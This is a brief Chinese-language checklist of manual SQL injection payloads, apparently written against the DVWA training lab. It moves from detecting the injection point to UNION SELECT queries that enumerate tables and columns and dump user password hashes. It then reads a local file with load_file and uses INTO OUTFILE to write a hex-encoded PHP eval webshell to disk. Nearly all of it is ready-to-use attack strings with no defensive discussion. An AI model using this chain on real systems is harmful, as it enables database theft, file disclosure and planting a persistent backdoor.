1、使用單引號判斷是否有注入點(報錯說明存在注入點)
2、查詢正在使用中的用戶user、數據庫(%27union%20select%20user(),database()+--+%20)
3、爆數據庫所有表名('UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761+--+&Submit=Submit#)
4、爆user表下所有字段名“0x7573657273轉碼后是users”('UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273+--+&Submit=Submit#)
5、查詢列名user、password下的所有用戶名和密碼('UNION SELECT user,password from users+--+&Submit=Submit#)
6、加載C盤根目錄下的root.ini文件('UNION SELECT 1,load_file('c:\\root.ini')+--+&Submit=Submit#)
7、一句話木馬,在C盤根目錄生成muma.php的木馬文件(' union select 0x3C3F70687020406576616C28245F504F53545B2763686F70706572275D293B3F3E,2 into outfile 'c:/muma.php'+--+&Submit=Submit#)